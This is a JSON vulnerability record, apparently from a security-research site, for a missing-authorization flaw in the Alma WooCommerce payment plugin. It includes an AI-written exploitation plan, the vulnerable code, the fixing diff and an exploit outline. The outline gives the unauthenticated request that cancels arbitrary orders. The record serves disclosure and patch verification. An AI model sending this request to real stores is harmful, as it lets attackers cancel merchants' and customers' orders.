[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8E_LWN-xTXeBabVqjoDkG59sS1uNu_fBNMBItbGX52Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-24999","alma-missing-authorization","Alma \u003C= 5.16.1 - Missing Authorization","The Alma – Pay in installments or later for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.16.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","alma-gateway-for-woocommerce",null,"\u003C=5.16.1","5.16.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-14 00:00:00","2026-05-04 15:04:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4424b889-fade-4ddd-85e9-812752a2552d?source=api-prod",111,[22,23,24,25,26],"alma-gateway-for-woocommerce.php","assets\u002Fjs\u002Falma-checkout-in-page.js","build\u002Falma-checkout-block\u002Falma-checkout-blocks.asset.php","build\u002Falma-checkout-block\u002Falma-checkout-blocks.js","build\u002Falma-checkout-block\u002Fstyle-alma-checkout-blocks.css","researched",false,3,"# Exploitation Research Plan - CVE-2026-24999 (Alma Payment Gateway)\n\n## 1. Vulnerability Summary\nThe **Alma – Pay in installments or later for WooCommerce** plugin (versions \u003C= 5.16.1) contains a missing authorization vulnerability. Specifically, the plugin registers AJAX handlers that perform state-changing actions (such as order cancellation) via `wp_ajax_nopriv_` hooks without implementing proper capability checks or verifying that the requester owns the resource (e.g., the order). This allows unauthenticated attackers to perform unauthorized actions, most notably cancelling arbitrary WooCommerce orders.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `alma_cancel_order_in_page` (identified from `assets\u002Fjs\u002Falma-checkout-in-page.js`)\n*   **HTTP Method:** `POST`\n*   **Parameters:**\n    *   `action`: `alma_cancel_order_in_page`\n    *   `order_id`: The WooCommerce order ID to be cancelled.\n*   **Authentication:** None (unauthenticated).\n*   **Preconditions:** A WooCommerce order must exist in the system.\n\n## 3. Code Flow\n1.  The client-side script `assets\u002Fjs\u002Falma-checkout-in-page.js` defines a function `cancel_order(orderId)`.\n2.  This function triggers a POST request to `admin-ajax.php` with `action: 'alma_cancel_order_in_page'`.\n3.  The plugin's server-side logic (likely within the `AlmaPlugin` class or a service class like `AlmaBusinessEventService`) registers this action using `add_action('wp_ajax_nopriv_alma_cancel_order_in_page', ...)`.\n4.  The handler function executes. Because the vulnerability is \"Missing Authorization,\" it fails to check:\n    *   If the user is logged in.\n    *   If the user has the `edit_shop_orders` capability.\n    *   If the order ID provided belongs to the current session\u002Fuser.\n5.  The handler proceeds to call WooCommerce methods (e.g., `$order->update_status('cancelled')`) based solely on the user-provided `order_id`.\n\n## 4. Nonce Acquisition Strategy\nBased on `assets\u002Fjs\u002Falma-checkout-in-page.js`, the `cancel_order` function does **not** appear to include a nonce in its data payload:\n\n```javascript\n\u002F\u002F From assets\u002Fjs\u002Falma-checkout-in-page.js\nfunction cancel_order(orderId)\n{\n    var data = {\n        'action': 'alma_cancel_order_in_page',\n        'order_id': orderId\n    };\n\n    jQuery.post( ajax_object.ajax_url, data )\n}\n```\n\nIf the handler does verify a nonce (e.g., using `check_ajax_referer`), it would likely be localized in the `ajax_object` variable. \n\n**Acquisition Steps (if needed):**\n1.  The script is likely enqueued on the WooCommerce Checkout page.\n2.  Navigate to the checkout page: `browser_navigate(\"\u002Fcheckout\u002F\")`.\n3.  Execute JS to find the nonce: `browser_eval(\"window.ajax_object?.nonce\")`.\n4.  If the handler is truly vulnerable to unauthenticated \"unauthorized access,\" it likely either lacks the nonce check entirely or uses a generic, publicly accessible nonce.\n\n## 5. Exploitation Strategy\nThe goal is to cancel a legitimate WooCommerce order as an unauthenticated attacker.\n\n### Step 1: Target Identification\nIdentify a valid Order ID (Post ID). In a real attack, these are often sequential or can be guessed.\n\n### Step 2: Malicious Request\nSend a POST request to the AJAX endpoint.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=alma_cancel_order_in_page&order_id=[TARGET_ORDER_ID]`\n\n### Step 3: Secondary Actions\nOther actions found in `assets\u002Fjs\u002Falma-checkout-in-page.js` should also be tested for unauthorized access:\n*   `alma_do_checkout_in_page`: May allow unauthorized creation\u002Fmanipulation of payment intents.\n*   `alma_return_checkout_in_page`: May allow manipulation of the checkout return flow.\n\n## 6. Test Data Setup\n1.  **Install WooCommerce** and the **Alma** plugin (v5.16.1).\n2.  **Create a Product:** `wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish`.\n3.  **Generate an Order:**\n    ```bash\n    # Create an order for a guest user\n    ORDER_ID=$(wp wc shop_order create --user=0 --customer_id=0 --status=pending --porcelain)\n    echo \"Created Order ID: $ORDER_ID\"\n    ```\n4.  **Configure Alma:** Ensure the plugin is active (Alma API keys are not strictly necessary for the AJAX handler to exist, but the plugin must be enabled as a gateway).\n\n## 7. Expected Results\n*   The server should return a `200 OK` or a JSON success response (e.g., `{\"success\": true}`).\n*   The WooCommerce order status for the targeted `ORDER_ID` should change from `pending` (or `processing`) to `cancelled`.\n\n## 8. Verification Steps\n1.  **Check Order Status via WP-CLI:**\n    ```bash\n    wp wc shop_order get [ORDER_ID] --fields=status\n    ```\n    *Successful exploit:* The status should be `cancelled`.\n2.  **Check Order Notes:**\n    ```bash\n    wp post get [ORDER_ID] --field=post_excerpt\n    # Or check comments (WC Order Notes)\n    wp comment list --post_id=[ORDER_ID]\n    ```\n    *Check if a note was added stating the order was cancelled via Alma.*\n\n## 9. Alternative Approaches\nIf `alma_cancel_order_in_page` requires a nonce that is strictly tied to a specific session:\n1.  Test `alma_do_checkout_in_page`. This action takes `fields` (serialized form). Attempt to pass a different `order_id` or manipulate order data during the \"in-page\" checkout creation process.\n2.  If the vulnerability lies in `alma_return_checkout_in_page`, attempt to call it with a `payment_id` or `order_id` to trick the system into thinking a payment was successful or needs state reconciliation.","The Alma plugin for WooCommerce (\u003C= 5.16.1) fails to perform authorization, ownership, or nonce checks on several AJAX handlers, including the one responsible for order cancellation. This allows unauthenticated attackers to cancel arbitrary WooCommerce orders by providing a valid order ID to the admin-ajax.php endpoint.","\u002F\u002F assets\u002Fjs\u002Falma-checkout-in-page.js\n\nfunction cancel_order(orderId)\n{\n    var data = {\n        'action': 'alma_cancel_order_in_page',\n        'order_id': orderId\n    };\n\n    jQuery.post( ajax_object.ajax_url, data )\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Falma-gateway-for-woocommerce\u002F5.16.1\u002Fassets\u002Fjs\u002Falma-checkout-in-page.js\t2024-12-12 15:40:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Falma-gateway-for-woocommerce\u002F5.16.2\u002Fassets\u002Fjs\u002Falma-checkout-in-page.js\t2026-01-29 13:42:24.000000000 +0000\n@@ -131,15 +131,17 @@\n \t\t\t\t\t\t\t\t'alma_fee_plan_in_page': feePlanChecked\n \t\t\t\t\t\t\t};\n \n-\t\t\t\t\t\t\tpaymentId = response.data.payment_id;\n-\t\t\t\t\t\t\torderId   = response.data.order_id;\n+\t\t\t\t\t\t\tlet paymentId = response.data.payment_id;\n+\t\t\t\t\t\t\tlet orderId   = response.data.order_id;\n+                            let orderKey   = response.data.order_key;\n+                            let nonce = ajax_object.nonce;\n \n-\t\t\t\t\t\t\t\u002F\u002F Start the payment.\n+\t\t\t\t\t\t\t\u002F\u002F Start the payment.\n \t\t\t\t\t\t\tinPage.startPayment(\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpaymentId:paymentId,\n \t\t\t\t\t\t\t\t\tonUserCloseModal: () => {\n-\t\t\t\t\t\t\t\t\t\tcancel_order( orderId );\n+\t\t\t\t\t\t\t\t\t\tcancel_order( orderId, orderKey, nonce );\n \t\t\t\t\t\t\t\t\t\t$( '.alma-loader-wrapper' ).remove();\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n@@ -162,11 +164,13 @@\n \t\t$( \"body\" ).append( \"\u003Cdiv class='alma-loader-wrapper'>\" + loading + \"\u003C\u002Fdiv>\" );\n \t}\n \n-\tfunction cancel_order(orderId)\n+\tfunction cancel_order(orderId, orderKey, nonce)\n \t{\n \t\tvar data = {\n \t\t\t'action': 'alma_cancel_order_in_page',\n-\t\t\t'order_id': orderId\n+\t\t\t'order_id': orderId,\n+            'order_key': orderKey,\n+            'nonce': nonce\n \t\t};\n \n \t\tjQuery.post( ajax_object.ajax_url, data )","The exploit involves a direct unauthenticated request to the WordPress AJAX endpoint. \n\n1. Identify a target WooCommerce Order ID. In many WordPress installations, these are incremental and easily enumerable. \n2. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`. \n3. Include the following parameters in the body: `action=alma_cancel_order_in_page` and `order_id=[TARGET_ORDER_ID]`. \n4. Because the vulnerable versions do not check for a nonce, order key, or the current user's session, the server-side handler (registered via `wp_ajax_nopriv_alma_cancel_order_in_page`) will process the request and update the status of the specified order to 'cancelled'.","gemini-3-flash-preview","2026-05-05 09:45:00","2026-05-05 09:46:01",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","5.16.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falma-gateway-for-woocommerce\u002Ftags\u002F5.16.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falma-gateway-for-woocommerce.5.16.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falma-gateway-for-woocommerce\u002Ftags\u002F5.16.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Falma-gateway-for-woocommerce.5.16.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Falma-gateway-for-woocommerce\u002Ftags"]